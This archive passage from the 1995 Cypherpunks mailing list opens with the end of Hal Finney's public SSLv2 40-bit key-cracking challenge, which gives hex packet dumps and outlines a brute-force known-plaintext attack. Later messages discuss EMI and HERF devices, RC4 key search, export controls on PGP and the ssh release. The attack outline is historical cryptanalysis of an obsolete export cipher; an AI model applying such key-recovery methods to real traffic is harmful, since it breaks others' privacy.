0x55...0x9f RC4 encrypted CONNECTION-ID from SERVER-HELLO [16 bytes] This is the first message sent encrypted with the CLIENT-WRITE-KEY and could also be used as known plaintext to check a guessed key. The next message is SERVER-FINISHED, sent encrypted from server to client: 0x80 0x21 0x79 0x84 0xc6 0xb6 0xde 0xf4 0x4c 0xd2 0x52 0x56 0xdc 0x58 0x23 0xa0 0xfa 0x4d 0x06 0x7d 0x4c 0x12 0x32 0x32 0xea 0xaa 0x5a 0xb6 0xa7 0xb8 0x1a 0x66 0xeb 0x65 0x56 This is interpreted as follows: 0x80 0x21 Packet length, 33 bytes follow 0x79...0x4d MAC [16 bytes] 0x06 RC4 encrypted MSG-SERVER-FINISHED (0x06) 0x7d...0x56 RC4 encrypted SESSION-ID-DATA [16 bytes] The SESSION-ID-DATA has not been previously sent in the clear. It would be used to cache the key info for a future session. >From here on out, the handshaking is done. Every message sent will be encrypted and packetized. The first two bytes are packet length, then 16 bytes of MAC, then the data. First data message from client to server. Presumably it is an http "GET" request, with form information embedded in the URL. This is the main one to try decrypting (starting with 0x6b as the first encrypted byte). 0x82 0xf8 0x07 0x97 0xef 0x99 0x66 0x45 0x48 0x22 0xe4 0xdc 0x31 0xe4 0xf9 0x0b 0xb9 0x98 0x6b 0x99 0x2a 0x09 0x29 0xae 0xa6 0x8d 0xbf 0xb0 0xd3 0xa6 0x83 0xec 0x69 0x1c 0xcc 0x11 0x66 0x84 0x21 0x77 0xfb 0x86 0x73 0x10 0xfb 0xa9 0xe3 0x3b 0x2f 0xd4 0x0f 0xb9 0xbd 0x3f 0xa4 0x0b 0x41 0xd5 0xc9 0x90 0x6d 0xa7 0x34 0x7a 0x5a 0xc1 0x69 0x8d 0xe9 0x64 0xad 0x0d 0xa8 0xae 0x91 0xd1 0xa6 0x70 0xac 0xf9 0xe6 0x11 0x38 0xa0 0xa7 0xd9 0x7c 0xc7 0x18 0x17 0xe2 0x0d 0x8d 0x30 0xb0 0x1c 0x22 0x25 0xa3 0x61 0xee 0xa2 0xca 0xe5 0xf8 0x20 0x5b 0xe1 0x58 0xcf 0xa5 0x21 0xe3 0x23 0xa6 0xfb 0xf6 0x2b 0xba 0x69 0xca 0xa3 0xe6 0x4a 0x47 0x4c 0x77 0xb8 0xc2 0x93 0x8e 0xb7 0x5d 0x17 0x06 0x57 0x19 0x6e 0x00 0x34 0xd6 0xc5 0x64 0x5e 0x23 0x60 0x03 0xf9 0xb2 0x9d 0xee 0xb4 0x83 0x28 0xae 0xfe 0xbb 0xb0 0xe3 0x49 0xfc 0x8f 0x68 0x24 0x51 0x03 0x26 0x8f 0x2b 0xcd 0xc1 0x0c 0x6d 0x79 0xed 0xc4 0x7f 0x3a 0x1e 0x2a 0xc5 0x4e 0xd8 0xe9 0x35 0x27 0xb7 0xde 0x50 0xc3 0xac 0x49 0x84 0x55 0x90 0xa6 0x44 0xcb 0xf7 0xfc 0x69 0xb4 0x19 0xea 0xb6 0xf0 0x72 0x37 0xef 0xfc 0xdf 0x20 0xaf 0x34 0x10 0xa8 0xf9 0xc2 0x74 0xa8 0x64 0xb2 0xd5 0xe9 0x25 0xd8 0xf2 0xca 0xf6 0xb6 0xa0 0x35 0x6f 0x3c 0x6c 0x4c 0xc6 0x99 0x4e 0x51 0xc4 0x5c 0x32 0x8e 0x0b 0x7c 0x59 0x7b 0xda 0x19 0x3f 0x89 0x7b 0xd3 0x33 0x9c 0x2d 0x20 0x46 0x59 0x26 0xb4 0x20 0x61 0x54 0x49 0xb8 0x71 0xa4 0xde 0x2b 0x7b 0xf3 0xdd 0xb2 0x64 0xa1 0x1a 0x39 0x4b 0x50 0x20 0x21 0x6a 0x9c 0x3d 0x34 0xaf 0x91 0xf4 0x2e 0xe1 0x4c 0x74 0x6a 0xed 0x4e 0x18 0x3d 0x11 0xe5 0xa9 0xf6 0x87 0xb3 0x7a 0xf0 0xf1 0x5e 0x9b 0x9c 0x1f 0xc0 0x44 0x72 0xdc 0xc3 0xe9 0x62 0x88 0x0b 0xec 0x3c 0x71 0x29 0x99 0xac 0xfa 0x1f 0x31 0xdd 0xae 0x5f 0x84 0x3c 0x16 0x04 0xdb 0x9d 0x4b 0xbb 0xdf 0x6c 0x32 0x0e 0xa0 0xe7 0xa0 0xdc 0x6a 0xa5 0x49 0x12 0xd7 0x59 0xce 0x3c 0x5d 0x36 0x46 0xbf 0x0b 0xcb 0xf7 0x0e 0x41 0x50 0x37 0x53 0xb5 0xdf 0x6d 0xc0 0x7e 0x7f 0x35 0x75 0xf5 0xec 0xad 0x40 0xb5 0x69 0x3c 0xb7 0x5c 0x44 0x0b 0x48 0xe6 0x07 0x41 0xb8 0x4c 0x9d 0x2c 0x4c 0xdf 0xf3 0xa7 0x15 0xcf 0x12 0xdd 0x11 0xcb 0xeb 0x3b 0x89 0x11 0x2e 0x6b 0x84 0x1a 0x3d 0xd9 0x25 0xa2 0x51 0xed 0xdf 0x93 0x76 0x86 0xc4 0xa4 0xcb 0xe8 0x5c 0xd8 0x7a 0x41 0x7d 0xc8 0x70 0xa1 0x0c 0xa1 0xd8 0xda 0xe2 0x75 0x05 0x0b 0x0b 0x83 0x3c 0x6c 0x71 0x13 0x42 0x19 0xcd 0x5d 0xd0 0x99 0x7b 0x24 0xc9 0x7b 0xc2 0x1c 0x2e 0x6e 0x78 0xe0 0xad 0x7f 0x7b 0x4b 0x50 0x33 0x7e 0xa0 0xb9 0x93 0xf4 0x75 0x39 0x50 0x41 0x41 0xe3 0x2b 0x0f 0xf1 0xf3 0xbc 0x84 0x9d 0x6f 0xa7 0x27 0xa7 0x58 0x55 0x8d 0xc7 0xf1 0xa1 0xb8 0x60 0x6f 0x0f 0x19 0xac 0xea 0xef 0x2c 0xba 0x90 0x9b 0x79 0x7b 0x61 0x54 0x03 0xf6 0x92 0x10 0xb4 0x9c 0x78 0x85 0xf3 0x7b 0x3f 0x0e 0xf9 0x8e 0x3d 0xa3 0x43 0xab 0xf4 0x33 0xa4 0x55 0x4b 0x86 0x50 0x75 0x93 0x3a 0x50 0x24 0xae 0x70 0x0c 0xde 0xa7 0x52 0x28 0x43 0x07 0x35 0x5c 0x5a 0xeb 0xc0 0xe1 0xba 0x8c 0xcd 0x76 0xdc 0x07 0x1f 0xa4 0x57 0xdd 0x18 0xa3 0x4e 0xc3 0xf3 0x7b 0x2d 0x0e 0x6b 0xb9 0x92 0xc1 0xfb 0x54 0xc8 0xd7 0x33 0x31 0x43 0xe1 0xce 0xb5 0x89 0xbd 0x0d 0x4e 0x14 0xbc 0x64 0xc5 0xf6 0x28 0x58 0x84 0x64 0xe7 0x8c 0xb2 0xa9 0xd2 0x0b 0x9f 0x1c 0x28 0xfd 0x95 0x93 0x8e 0x51 0x9a 0x5b 0xeb 0x0d 0x51 0x60 0x93 0x35 0x7c 0x59 0x7d 0x6f 0x37 0xbd 0xa4 0x9b 0x2d 0x4f 0x75 0x92 0xbe 0x85 0xc6 0xc3 0x68 0xf6 0x41 0xcc 0x51 0x4c 0xfc 0xda 0x21 0xc3 0x77 0xc1 0xe2 0x79 0xe8 0x0d 0xc7 0x26 0xc3 0x14 0x9e 0x48 0x2f 0xa4 0x95 0x21 0x24 0x61 0x31 0xd5 0x3b 0x14 0x42 0x45 0xd1 0x6d 0x90 0xfe 0x72 0x28 0xa7 0x81 0xe9 0x07 0x47 0x8a 0x0d 0xda 0x08 0x99 0xbc 0x76 0x42 0xec 0x0b 0xfd 0xeb 0x69 0x47 0x58 0xd7 0x81 0x6b 0x71 0xf6 0xb6 0xbe 0xcd 0x4e 0x29 0xd9 0xdb 0xc8 0x12 0x5c 0x46 0xa0 0x3c 0x5b 0x57 0x2b 0x59 0x92 0x36 0x3c 0x6a 0xc3 0x4a 0x13 0x41 0x34 0x2f 0x12 0x13 0xa2 0x51 0xfb 0xf2 0xe0 0x0b 0x2f 0xfc 0x14 0x25 0xad 0x60 0x3a 0x35 0x62 0x7e 0xd2 0x11 0x4c 0x4a 0x29 0xa4 0xca 0x44 This is the first data packet response from the server: 0x80 0x84 0x16 0xc9 0xe0 0x80 0xd6 0x0b 0x4e 0xd8 0xfe 0x00 0xce 0xe2 0x07 0xe1 0xec 0xb9 0x03 0xa8 0x51 0x0b 0xc9 0xd5 0xd9 0x27 0x59 0x07 0x83 0x0c 0x2b 0x75 0x24 0x50 0xcf 0x0c 0xd2 0x8e 0x7b 0xbc 0xbe 0x65 0x48 0x23 0xc9 0xdb 0x82 0x2f 0x54 0x50 0x3b 0xf2 0x50 0xd3 0x15 0x30 0xec 0x78 0xa2 0x61 0x09 0x9a 0x2a 0xc8 0x9c 0x07 0x67 0x70 0x44 0x46 0xca 0xe4 0x65 0x1a 0x0e 0xd9 0x2a 0x77 0xeb 0xc1 0x7e 0x37 0x83 0x43 0x2e 0x26 0xde 0x5f 0x9d 0xa3 0x31 0x87 0xf2 0xe1 0x4f 0x67 0x8d 0xfc 0x4f 0x3f 0x00 0x2c 0x40 0x70 0x34 0x2b 0x62 0x80 0xcf 0x0d 0x93 0xff 0xc9 0x5e 0xd2 0x21 0xf6 0xa4 0xf4 0xd7 0x13 0x13 0x59 0x44 0x6c 0xd1 0xd1 0x05 0x8f 0x5f 0x15 0x10 0x08 0xed Here is the second data packet response from the server: 0x81 0x04 0xc9 0x4c 0x54 0xcb 0x2c 0xe0 0x8e 0xf9 0x13 0x31 0xb4 0xf1 0x82 0x92 0xd3 0x65 0xc9 0x45 0x7e 0x0f 0x8e 0x54 0x4f 0x7f 0x35 0xc8 0x20 0xa8 0x55 0x18 0x1e 0x27 0x5d 0x6a 0x53 0x79 0xd2 0x2e 0x01 0x5d 0x06 0x25 0x6f 0xaa 0x49 0x68 0x73 0x4e 0x35 0x6b 0x87 0x47 0x6d 0x26 0xb6 0xb0 0x1e 0xd0 0x96 0xd5 0xe6 0x4f 0x94 0x10 0x9f 0x5f 0x83 0x7e 0x0c 0x67 0x36 0x82 0xce 0xcb 0xb1 0xd5 0xc9 0xf9 0xf5 0x32 0xa9 0xf3 0x31 0xbf 0x40 0xe4 0xa6 0x24 0x0e 0xc3 0xfe 0x61 0x24 0x59 0x9d 0x85 0x35 0x0d 0x7d 0xbe 0x16 0x0b 0x8a 0x98 0x74 0x7b 0x5a 0x37 0x73 0x30 0xd9 0x66 0x6c 0x65 0xaf 0xd4 0xc7 0x2a 0x8f 0x14 0xe3 0xf6 0x06 0x63 0x19 0x53 0xc5 0x9a 0x69 0x63 0x29 0x04 0x7a 0x28 0x0e 0x7b 0x17 0xf3 0x60 0xee 0x9d 0xbd 0xe5 0x00 0x0a 0x9d 0x1b 0xc5 0x26 0x93 0x19 0x78 0x43 0x2f 0xe4 0x9a 0x27 0x3c 0x13 0x03 0x9c 0xab 0xad 0xad 0xe1 0xbd 0x8b 0x7c 0x04 0x74 0x7e 0x08 0x50 0xa6 0x19 0x28 0xb7 0x6c 0xbe 0x2b 0x48 0x14 0xd2 0xcb 0xa6 0xad 0x69 0x41 0x31 0x93 0x3a 0x8d 0x87 0x78 0x80 0xc1 0x85 0xa5 0x7a 0x79 0xd1 0x55 0xca 0xb8 0x94 0x0b 0x65 0x3e 0xf2 0x51 0x8d 0xae 0x89 0x87 0x96 0xae 0xd5 0x4d 0x2f 0x14 0x66 0xe6 0xcc 0x63 0x2f 0x50 0x98 0x98 0x59 0xfa 0xf6 0xeb 0xb6 0x44 0x9d 0xc2 0x6c 0xe2 0x7d 0xc9 0x47 0xfa 0x3d 0xa4 0x6b 0x71 0x52 0xcc 0x15 0xdf 0xb3 0x92 0x3f 0x67 0x8e 0x9e 0x84 0xd6 0x39 0xa0 This ends the communication. To try to attack this, the most effective approach would be to calculate CLIENT-READ-KEY by trying all possible values for the 40 least significant bits of the MASTER-KEY, and feeding that into the MD5 formula. Then use the known plaintext in the SERVER-VERIFY message to check the result. Once the proper 40 bit value is found, CLIENT-WRITE-KEY can easily be calculated and the data messages decrypted. Good luck! Hal Finney hfinney at shell.portal.com From shamrock at netcom.com Wed Jul 12 10:28:19 1995 From: shamrock at netcom.com (Lucky Green) Date: Wed, 12 Jul 95 10:28:19 PDT Subject: Don't trust the net too much Message-ID: <199507121725.NAA17614@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) wrote: >Go see Winn Schwartau talk about HERF guns sometime. He passed around >a picture of a device for < US$500 that could crash any computer within >50 yards.. Then again, it isn't too good for the person firing the gun URL, anyone? I'd like to build one of those devices. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAQFfSoZzwIn1bdtAQGWBQF/YHqHS5rJfVnuLDd3SV+oq1KhXsP47mE8 WW6IPO+mCDlN+liSfU/4NujUT7mAfLl1 =G/P3 -----END PGP SIGNATURE----- From erc at khijol.intele.net Wed Jul 12 10:29:55 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Wed, 12 Jul 95 10:29:55 PDT Subject: Don't trust the net too much In-Reply-To: Message-ID: On Wed, 12 Jul 1995, Doug Hughes wrote: > This just goes to show that we live in a world of electromagnetic soup. > We really don't know how it effects the body long term, or whether, having > more mission or life critical electronics could be interacting with over > devices. This was the theme of the program. There have been many examples of this - several cases of hams having their pacemakers go nuts when they keyed their transmitters, etc. But that doesn't mean that aviation avionics are sensitive - in fact, devices that are specifically designed to receive RF of a specific frequency are usually designed to reject RF of a different frequency, especially type accepted radios (the avionics package is required to be type accepted for that particular class of service, which includes spurious rejection, intermod products down XX dB, etc.) > Another example was on an airplane (several of them.. older ones mostly > I believe) pilots would occassionally lose instruments (VLS, etc) when > passengers would activate portable transistor radios and such. Particularly > radios.. But there was another case involving a portable computer.. These > cases have been documented. It's a good thing the plain wasn't on a > landing approach during a storm, or things could've gone very bad very > quickly. A transistor radio puts out such a minute amount of RF (at 455 KHz and/or 10.7 MHz, the IF freqs of the radio) that most insturments designed to pick up RF can't detect this stuff from more than a few feet away. FCC regulations say that if your avionics is being interfered with, it's YOUR problem, not the guy that just turned on his radio. If someone's avionics is being interfered when I turn on an AM/FM transistor radio, then I'd say that he either needs to get his avionics fixed, or he's using illegal consumer-grade radios (which are usually junk anyway - even much ham radio gear is garbage, unfortunately), instead of the type-accepted stuff he's supposed to be using. I'd be interested in finding out more about this guy and his "VLS-jumped-when-someone-turned-on-their-radio" story. > I heard about the portable computer via a different source. The guy > kept turning his computer on. The instruments would do a little dance. > The captain would tell the stewardess, she would tell the passenger, he > would turn it off for a while. Then, he would turn it on and repeat.. > Until finally he refused to turn it off, so they confiscated it and > returned it at the end of the trip. Urban Legend? maybe.. The early laptop computers would put out an amazing amount of crap. I used to have a Zenith laptop, and when I'd turn the thing on, it'd throw out junk that I could hear on every radio in the house, including the 2m FM stuff, the HF rig, and I could even hear it out in my car on the 2m mobile! I can believe it, but that's no excuse for just saying, "well, let's just ban all of it..." > Believe what you want, but investigate the reports before dissmissing it > out of hand as propaganda. I'd rather stay alive than rely on "theoretically > it shouldn't matter." :) My point is, it's not your, nor my responsibility to refrain from using our radios - it's the responsibility of the avionics people to make sure that their radios are within spec and are kept that way. If they don't bother, that's not my fault. > Keep in mind that newer planes (767, 757) let you do anything you want > while the plane is in flight (but now while landing or takeoff), so they > probably build better instrumentation and cabin shielding into the planes > these days. If they say keep it off, chances are they have a good reason.. Again, my contention is that they don't. > If you find categorical evidence to the contrary, I'm sure I would be very > relieved to see it posted here. (rather than wondering if somebody > in one of the 30 rows ahead of me might decide he knows better) The ng rec.radio.amateur.misc might have some additional stuff in the FAQ, and the ARRL certainly has a mountain of information on this - I'll poke around. 'echo help|Mail info at arrl.org' might yield some interesting things... -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From perry at imsi.com Wed Jul 12 10:39:33 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 10:39:33 PDT Subject: Don't trust the net too much In-Reply-To: Message-ID: <9507121739.AA10924@snark.imsi.com> Doug Hughes writes: > If you saw that PBS documentary (they want $20,000 for rebroadcast by the > way). It was an 87 or 88 or something like that. It would make you > a believer. There was a lady in a van that whenever she used her cellular > phone, her sun's breathing apparatus (lung impaired) went into alarm. > There was another case at a hospital pre-natal care word near the main > entrance to the hospital. Several occasions when a local bus loop went > by, and the guy happened to be talking on the intercom of the bus, several > of the units in the ward went into alarm and failed (they had a tough time > tracking that one down by the way). There is a huge difference between noting that some electronic equipment is temporarily vulnerable to interference, or that you can read screens at a distance from the emitted radiation, and saying that you can build these portable ray-guns that cause computers to fry at 200 yards. .pm From samman at CS.YALE.EDU Wed Jul 12 10:49:05 1995 From: samman at CS.YALE.EDU (Rev. Ben) Date: Wed, 12 Jul 95 10:49:05 PDT Subject: Don't trust the net too much In-Reply-To: <9507121505.AA10601@snark.imsi.com> Message-ID: On Wed, 12 Jul 1995, Perry E. Metzger wrote: > Doug Hughes writes: > > I think there was a question of some microelectronics being permenently > > damaged because of fusion at the MOS level (burning through the > > gate), > > To do that requires that you transfer energy from your device into the > computer you are attacking. How do you propose to do that? airburst? :) Ben. From m5 at dev.tivoli.com Wed Jul 12 10:53:54 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 12 Jul 95 10:53:54 PDT Subject: general RC4 key searcher: optimisations anyone? In-Reply-To: <9507121259.ZM1196@lennon.alias.com> Message-ID: <9507121753.AA08575@vail.tivoli.com> Jonathan Shekter writes: > >After all, the kind of really high powered systems that can make a > >large dent in the key space are not running Windows NT. > > Umm... ever hear of an Alpha? Also, I've been quite impressed with the Pentium times. It must have something to do with the "friendliness" towards byte operations in the Intel architecture. (Also also, I should note that one can only have sympathy for anybody trying to run NT on anything *but* a high-powered system :-) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From carolab at censored.org Wed Jul 12 10:54:15 1995 From: carolab at censored.org (Censored Girls Anonymous) Date: Wed, 12 Jul 95 10:54:15 PDT Subject: 17 down 696 to go /repost Message-ID: Something's wrong with the Primenet Mail server I think. I'm in pine, off the shell, so I can't sign it. Love Always, Carol Anne PGP.ZIP PART [017/713] This just cycles through: when part 713 is reached, part 0 will be recycled. We are on export 0 at the moment. _________________________________________________________________ ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ _________________________________________________________________ Warning: it may be illegal to use one of these as a sig file in the US Don't feel obliged to use this chunk just because you have requested it. It hardly matters if some parts aren't posted as there are easier ways to get PGP, like open ftp sites, from which it is 100% legal for both US and non-US people to ftp from. It is merely a political statement about the ridiculous nature of ITAR regulations Member Internet Society - Certified BETSI Programmer - WWW Page Creation ------------------------------------------------------------------------- Carol Anne Braddock <--now running linux 1.0.9 for your pleasure carolann at censored.org __ __ ____ ___ ___ ____ carolab at primenet.com /__)/__) / / / / /_ /\ / /_ / carolb at spring.com / / \ / / / / /__ / \/ /___ / ------------------------------------------------------------------------- A great place to start My Cyber Doc... From paul at poboy.b17c.ingr.com Wed Jul 12 10:54:36 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Wed, 12 Jul 95 10:54:36 PDT Subject: EMI (was: Re: Don't trust the net too much) In-Reply-To: Message-ID: <199507121749.AA12206@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Ed Carp said: > This sounds like absolute propoganda. If you do the calculations, you'll > see that a 1 watt transmitter sitting 100 feet away from your target will > generate an EMF less than that 1000kW ERP TV transmitter array you just > flew over. If aircraft avionics were *that* sensitive, we'd have planes > falling out of the sky, and we don't. Oh, yes-- we do. The Army lost a small number (two or three) of of UH-60 Black Hawks in crashes where the flight control system suddenly commanded extreme pitch or attitude changes. Why? In all the crash cases, EMI from nearby TV or FM transmitters was found to be the proximate cause. The Army, and Sikorsky, immediately went to work to better shield the FCS from EMI. It's interesting to note that the Navy's SH-60, a UH-60 variant, was designed from the start to be EMI-immune. Ships' radars operate in the 10-100kW range, and that's a lot of EMI when you're landing 15-20m away from the radar mast. - -Paul - -- Paul Robichaux, KD4JZG | Do you support free speech even when you don't perobich at ingr.com | like what's being said? Be a cryptography user. Ask me how. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAQLM6fb4pLe9tolAQF9NgQAvwOl00o+zwfEsOXClVUgJ8odeHjq5B/Z +2O8pHo04cSin0wwsrRqdu/3XOwQ6UZpZmw/cnxBglZOnTwVvtoTkb/ZpYhPZr94 6tbnCCMxUb4W/Yiqz4sJ/AF4afxkyn6N9h8U0Hg86vkhYprTqIWL00/k1LDWkQOg XhpWLcci/vg= =LLsp -----END PGP SIGNATURE----- From jamesd at echeque.com Wed Jul 12 10:56:30 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 12 Jul 95 10:56:30 PDT Subject: RACIST MILITIA: ATF Message-ID: <199507121754.KAA19611@blob.best.net> At 07:46 AM 7/12/95 -0400, Perry E. Metzger wrote: > > >And why, pray tell, did you repost this here? Presumably because government instruments of repression are entirely relevant to the Cypherpunks list. I, for one, am much relieved to know that if I avoid conforming to targeted stereotypes, I am unlikely to be incinerated by federal agencies. -- ------------------------------------------------------------------ We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the omnipotent state.| jamesd at echeque.com From perry at imsi.com Wed Jul 12 11:02:56 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 11:02:56 PDT Subject: RACIST MILITIA: ATF In-Reply-To: <199507121754.KAA19611@blob.best.net> Message-ID: <9507121801.AA10968@snark.imsi.com> "James A. Donald" writes: > At 07:46 AM 7/12/95 -0400, Perry E. Metzger wrote: > > > > > >And why, pray tell, did you repost this here? > > Presumably because government instruments of repression are entirely > relevant to the Cypherpunks list. I'll be posting my 900 page listing of prison locations, then. I'm sure its relevant, right? .pm From vznuri at netcom.com Wed Jul 12 11:12:19 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 12 Jul 95 11:12:19 PDT Subject: Dr. Seuss, Technical Writer Message-ID: <199507121756.KAA04759@netcom5.netcom.com> What If Dr. Seuss Did Technical Writing? Here's an easy game to play. Here's an easy thing to say: If a packet hits a pocket on a socket on a port, And the bus is interrupted as a very last resort, And the address of the memory makes your floppy disk abort, Then the socket packet pocket has an error to report! If your cursor finds a menu item followed by a dash, And the double-clicking icon puts your window in the trash, And your data is corrupted 'cause the index doesn't hash, Then your situation's hopeless, and your system's gonna crash! You can't say this? What a shame sir! We'll find you Another game sir. If the label on the cable on the table at your house, Says the network is connected to the button on your mouse, But your packets want to tunnel on another protocol, That's repeatedly rejected by the printer down the hall, And your screen is all distorted by the side effects of gauss So your icons in the window are as wavy as a souse, Then you may as well reboot and go out with a bang, 'Cause as sure as I'm a poet, the sucker's gonna hang! When the copy of your floppy's getting sloppy on the disk, And the microcode instructions cause unnecessary risc, Then you have to flash your memory and you'll want to RAM your ROM. Quickly turn off the computer and be sure to tell your mom! ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^ \ / ~/ |\| | | |> | : : : : : : Vladimir Z. Nuri : : : : \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html From erc at khijol.intele.net Wed Jul 12 11:14:57 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Wed, 12 Jul 95 11:14:57 PDT Subject: EMI (was: Re: Don't trust the net too much) In-Reply-To: <199507121749.AA12206@poboy.b17c.ingr.com> Message-ID: On Wed, 12 Jul 1995, Paul Robichaux wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Ed Carp said: > > > This sounds like absolute propoganda. If you do the calculations, you'll > > see that a 1 watt transmitter sitting 100 feet away from your target will > > generate an EMF less than that 1000kW ERP TV transmitter array you just > > flew over. If aircraft avionics were *that* sensitive, we'd have planes > > falling out of the sky, and we don't. > > Oh, yes-- we do. The Army lost a small number (two or three) of of > UH-60 Black Hawks in crashes where the flight control system suddenly > commanded extreme pitch or attitude changes. Why? In all the crash > cases, EMI from nearby TV or FM transmitters was found to be the > proximate cause. The Army, and Sikorsky, immediately went to work to > better shield the FCS from EMI. > > It's interesting to note that the Navy's SH-60, a UH-60 variant, was > designed from the start to be EMI-immune. Ships' radars operate in the > 10-100kW range, and that's a lot of EMI when you're landing 15-20m > away from the radar mast. Well, I was speaking of commercial aircraft, not military, but the point is taken. I haven't had occasion to use my packet radio lashup on a UH-60 -- yet ;) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From http at mojones.mojones.com Wed Jul 12 11:22:09 1995 From: http at mojones.mojones.com (Mother Jones HTTP Daemon) Date: Wed, 12 Jul 95 11:22:09 PDT Subject: Your Beta Signup Confirmation Message-ID: <199507121804.LAA18120@comsec.com> You're now a confirmed MoJo Wire Beta Tester Username: cypherpunks Password: cypherpunks For now, look at Thanks for participating! From tedwards at src.umd.edu Wed Jul 12 11:29:04 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Wed, 12 Jul 95 11:29:04 PDT Subject: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto In-Reply-To: Message-ID: On Wed, 12 Jul 1995, Black Unicorn wrote: > How elegant the way the National > Cryptological museum was opened. No fanfare, no publicity, no > invitations, just there to be discovered at first, like a little > secret. Stuck in an old motel, barely visible from Route 32, > dwarfed by the massive NSA complex. No way! That hotel was the place my parents stayed on the night after their marriage... -Thomas From habs at warwick.com Wed Jul 12 11:58:03 1995 From: habs at warwick.com (Harry S. Hawk) Date: Wed, 12 Jul 95 11:58:03 PDT Subject: Stormfront (was Re: FW: Edupage 7/9/95 (fwd)) In-Reply-To: Message-ID: <199507121855.OAA29076@cmyk.warwick.com> > On Tue, 11 Jul 1995, Perry E. Metzger wrote: > > I suspect that something is amiss (i.e. faked) about the following, > > but wat.com shows up as > > > > Wongs Advanced Technologies (WAT-DOM) > > 3221 Danny Pk > > Metairie, LA 70002 > > > > Domain Name: WAT.COM The following seems to work. > http://stormfront.wat.com/stormfront/ /hawk From ylo at cs.hut.fi Wed Jul 12 12:16:58 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Wed, 12 Jul 95 12:16:58 PDT Subject: ANNOUNCEMENT: Ssh (Secure Shell) remote login program In-Reply-To: Message-ID: <199507121916.WAA06662@shadows.cs.hut.fi> > ssh, while an obvious name, already collides with a nice shar decoder and > a different kind of secure shell from CFS. Ssh has already been registered with IANA (Internet Assigned Numbers Authority) as the name of the service. I would rather not change it without a compelling reason. It is also easy to obtain from rsh by replacing the r by s (which also makes for scp, sshd, and in future maybe also sdist). It is my understanding that CFS is in rather limited use (especially outside the US), and the ssh shar extractor is not widely used either (neither can be found from the archie database at archie.funet.fi). IETF has a thing called Site Security Handbook that they abbreviate SSH, but it is probably sufficiently different not to be confused. > Of course support for S/Key and tokens/hand held authenticators would be > useful additions for some situations (although inferior to RSA...). True. The agent protocol can currently be used to forward a connection to any program (which can mean device) that can perform RSA authentication. New authentication methods can be compatibly added later. S/Key can be used by making skeysh you login shell. Then you will first be asked for a normal password (if any), and then for the one-time password. I did not want to incorporate skey functionality directly into the software, because it is not clear to me if the arrangements in use (file names, formats, algorithms) have stabilized yet. Also, there is less need for skey as no passwords are transmitted in the clear. > Integration with TCP/NFS and/or client-server CFS would be fantastic. > (One local CFS server acting as a secure client over tcp to a remote > CFS server.) > Remote encrypted mount of an encrypted partition... Maybe, *maybe*, TCP/IP port forwarding could be used for this? (I don't know what CFS does because I have never seen CFS.) Tatu From stewarts at ix.netcom.com Wed Jul 12 12:49:09 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 12 Jul 95 12:49:09 PDT Subject: Q E D_j a k Message-ID: <199507121947.MAA28807@ix5.ix.netcom.com> > The American intelligence establishment today unveiled > one of its oldest secrets: how a small team of > codebreakers found the first clues that the Soviet Union > sought to steal the blueprints for the atomic bomb in Wow! They must really be looking for some good publicity these days. I wonder how much of their motivation is to get PR support for the black budget, and how much is to support continued crypto export laws? After all, if the Evil Foreigners had good crypto, the NSA wouldn't have been able to crack their codes, so therefore it's _vital_ to _national_security_ that we continue these great laws that are keeping good crypto securely locked up inside the US borders! (Yes, I know one-time-pads are provably good crypto, but they also depend on the security of key distribution and one-time use, which apparently broke down here. And the CIA's pretty good at chasing the guy with briefcases of code material handcuffed to their arms.) Watch for more pressure from the Administration.... # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From sean at escape.ca Wed Jul 12 13:00:08 1995 From: sean at escape.ca 